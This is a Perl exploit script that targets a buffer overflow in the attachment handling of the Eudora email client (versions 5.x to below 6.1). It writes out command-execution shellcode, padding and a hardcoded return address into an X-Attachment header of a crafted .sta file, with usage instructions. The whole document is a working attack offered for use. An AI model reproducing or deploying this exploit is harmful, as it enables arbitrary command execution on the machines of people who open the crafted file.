# Author:		LibX (libx@easydoesit.com)
# Date:			29-06-2004
# Exploit #:		1

# Program:		Eudora
# Tested on:		v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)
# Exploit Type:		Local Buffer overflow
# Shellcode:		Shellcode to execute a command
# Shellcode version:	v2.5 PRIVATE (GENERIC)
# How-tu-use:		EudExploit.pl <command to execute> > <urfilename>.sta



if(!($ARGV[0]))
{

	print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5");
	print("Usage: EudExploit.pl <command to execute> > <urfilename>.sta\n\n");
	print("Sample: EudExploit.pl notepad.exe > TestShell.sta");
	exit;

}



# command execution shellcode
$shellcode = 		"\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .
			"\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .
			"\xD9\x29\xD9\x81\xC7\x10\x11\x11" .
			"\x11\x81\xEF\x11\x11\x11\x11\xFE" .
			"\x07\x81\xC1\x10\x11\x11\x11\x81" .
			"\xE9\x11\x11\x11\x11\x29\xCF\x31" .
			"\xF6\x46\x56\x57\xBB\x66\x8B\x45" .
			"\x0C\xB9\x11\x11\x11\x11\xB8\x41" .
			"\x11\x11\x11\x2D\x32\x11\x11\x11" .
			"\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .
			"\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .
			"\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .
			"\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .
			"\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .
			"\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF";



# some crap
$buffer		= "A" x (268 - length($shellcode));



# EuLang.dll universal return address (625010E9: call edi)
$return		= "\xE9\x10\x50\x62";



print("From: me\n");
print("To: you\n");
print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");
print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");